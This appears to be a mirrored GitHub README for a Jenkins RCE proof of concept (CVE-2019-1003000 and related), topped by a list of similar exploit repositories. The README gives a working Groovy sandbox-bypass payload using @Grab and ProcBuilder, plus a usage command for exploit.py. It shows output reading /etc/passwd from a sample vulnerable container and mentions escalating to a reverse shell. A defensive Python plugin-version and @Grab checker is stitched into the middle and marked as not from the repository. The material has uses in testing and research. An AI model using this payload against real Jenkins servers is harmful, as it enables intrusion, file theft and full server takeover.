
adamyordan / Cve 2019 1003000 Jenkins Rce Poc

Licence: mit
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

Programming Languages

javascript
184084 projects - #8 most used programming language
groovy
2714 projects

Projects that are alternatives of or similar to Cve 2019 1003000 Jenkins Rce Poc

Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (-67.78%)
Mutual labels:  exploit, poc, cve, rce
Penetration testing poc
POCs, EXPs, scripts, privilege escalation tools and small utilities related to penetration testing---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1328.89%)
Mutual labels:  poc, cve, rce, exploit
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+181.48%)
Mutual labels:  exploit, poc, cve
Vulmap
Vulmap is a web vulnerability scanning and verification tool that can scan webapps for vulnerabilities and also has exploitation capabilities
Stars: ✭ 1,079 (+299.63%)
Mutual labels:  exploit, cve, rce
Jenkins Rce
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
Stars: ✭ 262 (-2.96%)
Mutual labels:  exploit, rce, jenkins
Medusa
🐈Medusa is a red-team arsenal platform, currently including scanning (200+ vulnerabilities), an XSS platform, a collaboration platform, CVE monitoring and other features, under continuous development http://medusa.ascotbe.com
Stars: ✭ 796 (+194.81%)
Mutual labels:  poc, cve, jenkins
Pwn jenkins
Notes about attacking Jenkins servers
Stars: ✭ 841 (+211.48%)
Mutual labels:  exploit, rce, jenkins
PoC-CVE-2021-41773
No description or website provided.
Stars: ✭ 39 (-85.56%)
Mutual labels:  poc, rce, cve
Ciscoexploit
Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)
Stars: ✭ 73 (-72.96%)
Mutual labels:  exploit, poc, rce
PocOrExp in Github
Aggregates existing PoCs or Exps on GitHub; CVE information comes from the official CVE site. Auto Collect Poc Or Exp from Github by CVE ID.
Stars: ✭ 544 (+101.48%)
Mutual labels:  exploit, poc, cve
Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (-61.48%)
Mutual labels:  exploit, cve, rce
exploits
Some personal exploits/pocs
Stars: ✭ 52 (-80.74%)
Mutual labels:  poc, rce, cve
Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (-72.22%)
Mutual labels:  exploit, poc, cve
Umbraco-RCE
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Stars: ✭ 61 (-77.41%)
Mutual labels:  exploit, poc, rce
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-68.89%)
Mutual labels:  exploit, poc, rce
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-92.59%)
Mutual labels:  exploit, rce, cve
Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (-1.11%)
Mutual labels:  exploit, poc, rce
Scripts-Sploits
A number of scripts POC's and problems solved as pentests move along.
Stars: ✭ 37 (-86.3%)
Mutual labels:  exploit, poc
CVE-2019-10149
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
Stars: ✭ 15 (-94.44%)
Mutual labels:  exploit, cve
vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (-82.96%)
Mutual labels:  exploit, cve

PoC: Jenkins RCE

SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

A proof of concept to allow users with Overall/Read permission and Job/Configure (and optional Job/Build) to bypass the sandbox protection and execute arbitrary code on the Jenkins master or node.

Update: An article by Orange Tsai explaining the exploit chain that combines CVE-2018-1000861 and CVE-2019-1003000, which bypasses the need for Overall/Read permission and results in a pre-auth RCE: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

Installation

$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
$ cd cve-2019-1003000-jenkins-rce-poc
$ pip install -r requirements.txt

Usage

Pass the target URL, job name, username/password credentials, and the system command to execute as arguments.

$ python exploit.py --url http://jenkins-site.com --job job_name --username your_user --password your_passwd --cmd "cat /etc/passwd"

Explanation

Quoted from Red Hat Bugzilla - Bug 1667566:

A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50. Script Security sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements. Both the pipeline validation REST APIs and actual script/pipeline execution are affected. This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master or node. All known unsafe AST transformations in Groovy are now prohibited in sandboxed scripts.

This PoC uses a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and tries to bypass the sandbox limitation in order to run arbitrary scripts (in this case, we will execute a system command).

As background, Jenkins's pipeline build script is written in Groovy. This build script is compiled and executed on the Jenkins master or a node, and contains the definition of the pipeline, e.g. what to do on slave nodes. Jenkins also allows the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so a regular user cannot do anything malicious to the Jenkins server.

However, because the build script is written in Groovy, we can use any class or function from Java packages (in sandbox mode, the dangerous built-in ones are blacklisted). In this case, we are using the AST-transforming annotation @Grab to make Jenkins import arbitrary Java packages from an external Maven repository. In this PoC, I use the ProcBuilder class defined in org.buildobjects:jproc:2.2.3 in order to run a system shell command.

The payload is defined as below:

import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","cat /etc/passwd").run().getOutputString()

The script above will be compiled and executed on the Jenkins master or node. After the job build is done, we can see the result of the shell command cat /etc/passwd in the job console output. Moreover, we can utilize this RCE to gain a reverse shell, and literally pwn the Jenkins server!
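The two defensive checks that follow from the explanation above are (a) whether the installed Script Security, Pipeline: Groovy and Pipeline: Declarative plugins are older than the fixed versions quoted from the Bugzilla text, and (b) whether a pipeline script carries a Grape annotation such as @Grab before it is allowed to run. The example below is added here and is not code from this repository; the plugin short names (script-security, workflow-cps, pipeline-model-definition) are the plugins' Jenkins artifact ids rather than names given on the page, the plugin inventory and the sample script are constructed, and flagging the other Grape annotations besides @Grab is an assumption about what a reviewer would also want to see.

```python
import re

# Fixed versions as stated in the quoted Bugzilla text (SECURITY-1266).
# Keys are the plugins' Jenkins short names (assumed; the page uses display names).
FIXED_VERSIONS = {
    "pipeline-model-definition": "1.3.4.1",  # Pipeline: Declarative
    "workflow-cps": "2.61.1",                # Pipeline: Groovy
    "script-security": "1.50",               # Script Security
}

# @Grab is the annotation named on the page; the other Grape annotations
# are Groovy's related ones, flagged here as an assumption.
GRAPE_ANNOTATION = re.compile(r"@(Grab|Grapes|GrabConfig|GrabResolver|GrabExclude)\b")


def parse_version(version):
    """Turn '1.3.4.1' into (1, 3, 4, 1) so versions compare numerically.
    Parsing stops at the first non-numeric component (e.g. '-beta')."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_vulnerable(short_name, installed):
    """True when the plugin is one of the three affected and is older than its fix.
    Tuple comparison treats a shorter prefix as older, so 1.3.4 < 1.3.4.1."""
    fixed = FIXED_VERSIONS.get(short_name)
    if fixed is None:
        return False
    return parse_version(installed) < parse_version(fixed)


def check_plugins(plugins):
    """plugins: iterable of (short_name, installed_version).
    Returns (short_name, installed, fixed) for every affected plugin."""
    return [(name, ver, FIXED_VERSIONS[name])
            for name, ver in plugins if is_vulnerable(name, ver)]


def find_grape_annotations(script):
    """Return (line_number, stripped_line) for each line carrying a Grape annotation."""
    hits = []
    for n, line in enumerate(script.splitlines(), start=1):
        if GRAPE_ANNOTATION.search(line):
            hits.append((n, line.strip()))
    return hits


# Constructed sample inventory: two plugins below the fix, one at it, one unrelated.
SAMPLE_PLUGINS = [
    ("script-security", "1.49"),
    ("workflow-cps", "2.61.1"),
    ("pipeline-model-definition", "1.3.4"),
    ("git", "3.9.1"),
]

# Constructed sample pipeline script; the artifact coordinates are not real.
SAMPLE_SCRIPT = """\
@Grab('org.example:demo:1.0')   // constructed, not a real artifact
class Dummy { }
node {
    echo 'hello'
}
"""

if __name__ == "__main__":
    for name, ver, fixed in check_plugins(SAMPLE_PLUGINS):
        print(f"[!] {name} {ver} is older than fixed version {fixed}")
    for n, line in find_grape_annotations(SAMPLE_SCRIPT):
        print(f"[!] line {n}: {line}")
```

On a live server, the inventory fed to check_plugins would come from the plugin manager, and find_grape_annotations would run over Jenkinsfiles and shared library sources in SCM, since the quoted text notes that controlling those contents is the other route to the same bypass.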

Example Vulnerable Site

An example vulnerable Jenkins is provided in this repository in the directory sample-vuln as a Docker container. After booting up, the container will host a Jenkins site on port tcp/8080, with a regular user holding Overall/Read + Job/Configure + Job/Build permission (credentials user1:user1), and a pipeline job with id my-pipeline.

$ cd sample-vuln
$ ./run.sh

$ cd ..
$ python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"

[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] echo
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
jenkins:x:1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash

[Pipeline] End of Pipeline
Finished: SUCCESS

Reference
